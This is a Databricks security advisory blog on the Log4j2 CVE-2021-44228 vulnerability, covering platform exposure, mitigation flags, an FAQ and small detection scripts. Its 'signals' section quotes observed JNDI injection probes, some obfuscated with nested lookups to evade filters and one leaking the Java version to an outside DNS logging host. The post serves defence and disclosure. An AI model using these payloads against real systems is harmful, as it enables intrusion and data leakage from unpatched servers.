Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment

This blog relates to an ongoing investigation. We will update it as significant developments occur, including with detection rules to help people investigate potential exposure to CVE-2021-44228, both within their own usage of Databricks and elsewhere. Should our investigation conclude that customers may have been impacted, we will proactively notify those customers individually by email.

As you may be aware, a 0-day vulnerability has been discovered in Log4j2, the Java logging library, that could result in Remote Code Execution (RCE) if an affected version of log4j (2.0 through 2.15.0) logs an attacker-controlled string value without proper validation. Please see more details on CVE-2021-44228.

We currently believe the Databricks platform is not impacted. Databricks does not directly use a version of log4j known to be affected by the vulnerability within the Databricks platform in a way we understand may be vulnerable to this CVE (e.g., to log user-controlled strings). We have investigated multiple scenarios including the transitive use of log4j and class path import order and have not found any evidence of vulnerable usage so far by the Databricks platform.

While we don’t directly use an affected version of log4j, Databricks has out of an abundance of caution implemented defensive measures within the Databricks platform to mitigate potential exposure to this vulnerability, including by enabling the JVM mitigation (log4j2.formatMsgNoLookups=true) across the Databricks control plane. This protects against potential vulnerability from any transitive dependency on an affected version that may exist, whether now or in the future.

Potential issues with customer code

While we do not believe the Databricks platform is itself impacted, if you use log4j within your Databricks data plane cluster (e.g., to process user-controlled strings), your use may be vulnerable to the exploit if you have installed and are using an affected version, or have installed services that transitively depend on an affected version.

Please note that the Databricks platform is also partially protected from potential exploit within the data plane even if our customers utilize a vulnerable version of log4j within their own code as the platform does not use versions of JDKs that are particularly concerning for potential exploit (

[UPDATED 02.04.22]

Simba has released an updated version (2.6.22) of the Simba JDBC driver that uses Log4j 2.17.1. Please visit the JDBC Driver Download Page to download and use Simba JDBC Driver 2.6.22.

Refer to the release notes for confirmation.

Please note if you are using a version of the Simba JDBC driver prior to 2.6.21, it has a dependency on a version of log4j2 that is known to be affected by this vulnerability. It is your responsibility to validate whether your use of this driver is impacted by the vulnerability and to update if appropriate.

Recommended mitigation steps

Nevertheless, in an abundance of caution, you may wish to reconfigure any cluster on which you have installed an affected version of log4j (>=2.0 and

- update to log4j 2.16+; and/or

- for log4j 2.10 through 2.15.0, reconfigure the cluster with the known temporary mitigation (log4j2.formatMsgNoLookups set to true) and restart the cluster
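The two options above can be read as a small decision rule. The sketch below is illustrative only: the function and constant names are hypothetical, the version bounds are inferred from the bullets above (flag available for 2.10 through 2.15.0, upgrade target 2.16+), and it assumes plain dotted numeric version strings such as "2.14.1".

```python
# Hypothetical helper: map a log4j version string to the option(s) listed above.
# Bounds are inferred from this post, not from an authoritative advisory.

UPGRADE = "update to log4j 2.16+"
UPGRADE_OR_FLAG = "update to log4j 2.16+, or set log4j2.formatMsgNoLookups=true and restart"
OUT_OF_RANGE = "outside the 2.0 through 2.15.0 range discussed here"


def parse_version(text):
    """Turn '2.14.1' into (2, 14, 1). Assumes purely numeric components."""
    return tuple(int(part) for part in text.strip().split("."))


def recommended_action(version):
    parsed = parse_version(version)
    if parsed < (2, 0) or parsed >= (2, 16):
        return OUT_OF_RANGE
    if parsed >= (2, 10):
        # The temporary flag mitigation is described for 2.10 through 2.15.0.
        return UPGRADE_OR_FLAG
    # 2.0 through 2.9.x: only the upgrade option is listed.
    return UPGRADE


if __name__ == "__main__":
    for candidate in ("1.2.17", "2.8.2", "2.14.1", "2.15.0", "2.17.1"):
        print(candidate, "->", recommended_action(candidate))
```

Pre-release identifiers such as "2.0-beta9" are not handled and would need a real version parser.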

[UPDATED 12.15.21]

Since the original blog was posted, further information on log4j 2.15.x has come to light. We would suggest customers relying on this library upgrade to 2.16+ instead.

The steps to mitigate 2.10-2.15.0 are:





- Edit the cluster and job so that the Spark conf settings “spark.driver.extraJavaOptions” and “spark.executor.extraJavaOptions” are set to "-Dlog4j2.formatMsgNoLookups=true"

- Confirm the edit to restart the cluster, or simply trigger a new job run, which will use the updated Java options.

- You can confirm that these settings have taken effect in the “Spark UI” tab, under “Environment”
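If a cluster already sets other Java options, the flag needs to be appended rather than overwriting them. The following is a minimal sketch of that merge, assuming the Spark conf is available as a plain dictionary; the function name `with_mitigation` is hypothetical and not part of any Databricks API.

```python
# Sketch: add the mitigation flag to both Java option settings without
# dropping options that are already configured.

MITIGATION_FLAG = "-Dlog4j2.formatMsgNoLookups=true"
JAVA_OPTION_KEYS = (
    "spark.driver.extraJavaOptions",
    "spark.executor.extraJavaOptions",
)


def with_mitigation(spark_conf):
    """Return a copy of spark_conf with the flag present under both keys."""
    updated = dict(spark_conf)
    for key in JAVA_OPTION_KEYS:
        # Simplification: options are split on whitespace, so a quoted
        # option value that itself contains spaces is not supported.
        options = updated.get(key, "").split()
        if MITIGATION_FLAG not in options:
            options.append(MITIGATION_FLAG)
        updated[key] = " ".join(options)
    return updated


if __name__ == "__main__":
    existing = {"spark.driver.extraJavaOptions": "-Xss4m"}
    for key, value in with_mitigation(existing).items():
        print(key, value)
```

The resulting key and value pairs are what you would expect to see listed under “Environment” in the “Spark UI” tab after the restart.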

Please note that because we do not control the code you run through our platforms, we cannot confirm that the mitigations will be sufficient for your use cases.

Frequently Asked Questions (FAQ)

[UPDATED 12.17.21]

How can I update a user installed library of log4j2 to 2.16+?

Please refer to the Databricks KB article for details.

What is the timeline for updating dependencies to Log4j2 2.16+ versions?

While we currently believe the Databricks platform is not impacted, Databricks will be updating libraries that may use an affected version of log4j transitively according to our standard third-party patching SLAs and our Runtime Support Lifecycle. Please note that versions of DBR that are marked as end of support will not have any patches backported to them. Please follow this blog for updates.

Are there any drawbacks to adding JVM flags as a precautionary measure?

We believe that setting this flag should mitigate the vulnerability, and have tested it within our systems. However, as noted in our blog above, because Databricks does not control the code you may process through our services, we cannot confirm whether a particular mitigation will work. We would advise that you perform testing yourself to determine whether the mitigation is sufficient from your perspective within your cluster. We encourage you to test on a cluster after the restart.

Is Databricks vulnerable to CVE-2021-45046 in Log4j 2.15 patch?

Databricks does not believe that we use log4j in any way that is vulnerable to CVE-2021-45046. Customers should update to 2.16+ if they install and use log4j2 in any of their clusters. Databricks is in the process of considering whether to update to 2.16+ for reasons unrelated to this vulnerability. We do not currently have an ETA on when we may do so.

Databricks may not be vulnerable to the Log4j 2 CVE, but does Databricks use Log4j 1.x, and is that use vulnerable to any published CVEs for Log4j 1.x?

Databricks makes limited use of Log4j 1.x within our services. We do not believe that Databricks’ use of Log4j 1.x is impacted by any published CVEs. Databricks is evaluating an update to Log4j 2.16 or above for reasons unrelated to this vulnerability. We do not currently have an ETA on when we may do so.

However, if your code uses an affected Log4j 1.x class (JMSAppender or SocketServer), your use may potentially be impacted by these vulnerabilities. If you require these classes, you should update your code to rely on Log4j 2.16 or above.

If you cannot update to Log4j 2.16 or above you can implement a global init script that is designed to strip these classes out of Log4j 1.x at cluster launch. Please review this KB article for details.

NOTE: If your code relies on these classes, this will be a breaking change. Because we do not control the code you run, we cannot guarantee that this solution will prevent Log4j from loading the affected classes in all cases. You should run a test within your cluster (e.g., by attempting to import the affected classes within a notebook) to ensure that the affected classes are not reachable.

[UPDATED 12.20.21]

We performed a scan of the Databricks VM image and found vulnerable versions of log4j 2.x present. Are they vulnerable?

Databricks does have daemons running in the dataplane that use versions of log4j that have reported vulnerabilities. Databricks has thoroughly analyzed our use of log4j in these daemons and we do not believe our use of log4j in these daemons is exploitable by any known vulnerabilities.

Are Databricks subprocessors impacted by the Log4j vulnerability?

Databricks is actively working with our relevant sub-processors and service providers to determine whether there might be any impact. If we determine that any customer data may be impacted as a result of use by a subprocessor of the impacted libraries, you will be notified in accordance with our agreement with you.

Signals of potential attempted exploit

As part of our investigation, we continue to analyze traffic on our platform in depth. To date, we have not found any evidence of this vulnerability being successfully exploited against either the Databricks platform itself or our customers' use of the platform.

We have, however, discovered a number of signals that we think may be of significant interest to the security community:

In the initial hours following this vulnerability becoming widely known, automated scanners began scouring the internet utilizing simple callbacks to identify potential targets. While the vast majority of scans are using the LDAP protocol used in the initial proof-of-concept, we have seen callback attempts utilizing the following protocols:

Additionally, we have seen attackers attempt to obfuscate their activities to avoid prevention or detection by nesting message lookups. The following example (from a manipulated UserAgent field) will bypass simple filters/searches for “jndi:ldap”:

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

This obfuscation is not limited to the method, as message lookups can be deeply nested. As an example, this very exotic probe attempts to wildly obfuscate the JNDI lookup as well:

${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa:-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540}
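One way to catch probes like these in log searches is to flatten the nested lookups before matching. The sketch below is a rough approximation, not a reimplementation of Log4j's substitution logic: it only understands `lower`, `upper`, and the `:-` default-value syntax, it assumes every unknown lookup falls back to its default, and the function names are hypothetical.

```python
import re

# Matches a lookup that contains no further nested lookup, e.g. ${lower:l}.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match):
    body = match.group(1)
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        # Assume the lookup itself fails and the default value is used.
        return body.split(":-", 1)[1]
    # Unknown lookup (jndi, sys, ...): keep its text, but in angle brackets
    # so it is not matched again and the loop terminates.
    return "<" + body + ">"


def flatten(text):
    """Repeatedly resolve innermost lookups until none are left."""
    while INNERMOST.search(text):
        text = INNERMOST.sub(_resolve, text)
    return text


def looks_like_jndi_probe(text):
    return "jndi:" in flatten(text).lower()


if __name__ == "__main__":
    probe = ("${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}"
             ":${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa:-a}p"
             "://1639227068302CJEDj.kfvg5l.dnslog.cn/249540}")
    print(flatten(probe))
    print(looks_like_jndi_probe(probe))
```

Because the flattening is approximate, a match is best treated as a signal worth investigating rather than proof of an exploit attempt, and a non-match does not rule one out.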

Even without successful remote code execution, attackers can gain valuable insight into the state of the target environment, as message lookups can leak environment variables and other system information. This example attempts to enumerate the Java version on the target system:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${sys:java.version}.xxx.yyy.databricks.com.as3z18.dnslog.cn}

Modern Java runtimes, including the versions used within the Databricks platform, include restrictions that make wide-scale exploitation of this vulnerability more difficult. However, as mentioned in the Veracode research blog “Exploiting JNDI Injections in Java,” attackers can use object factories that already exist in the local classpath to trigger this (and similar) vulnerabilities. Attempts to load a remote class using a gadget chain that does not exist on the target may produce Java stack traces with a warning containing “Error looking up JNDI resource [ldap://xxx.yyy.yyy.zzz:port/class]”. Beyond the standard callback scanning, this warning is worth watching for, as it may indicate a more sophisticated exploitation attempt.
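A simple way to look for that warning is to scan application logs for the quoted message and pull out the resource it names. This is a minimal sketch that assumes the warning text appears exactly as quoted above; the function name and the sample log lines are made up for illustration.

```python
import re

# Captures the resource between the square brackets of the warning text.
JNDI_ERROR = re.compile(r"Error looking up JNDI resource \[([^\]]+)\]")


def find_jndi_lookup_errors(lines):
    """Return (line_number, resource) pairs for lines containing the warning."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_ERROR.search(line)
        if match:
            hits.append((number, match.group(1)))
    return hits


if __name__ == "__main__":
    # Hypothetical log lines, not taken from a real system.
    sample = [
        "INFO request handled",
        "WARN Error looking up JNDI resource [ldap://xxx.yyy.yyy.zzz:port/class].",
    ]
    for number, resource in find_jndi_lookup_errors(sample):
        print(number, resource)
```

In practice the same pattern could be fed from a file handle or a log query result, since the function only needs an iterable of strings.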

Security community call to action

We encourage the security community to keep sharing indicators of compromise and exploitation techniques to further protect from this critical vulnerability. If you prefer to engage privately about indicators of compromise, please contact our security team at [email protected].

Customer Enquiries

For customer enquiries, please file a ticket through the support portal or email us at [email protected] with any additional questions.
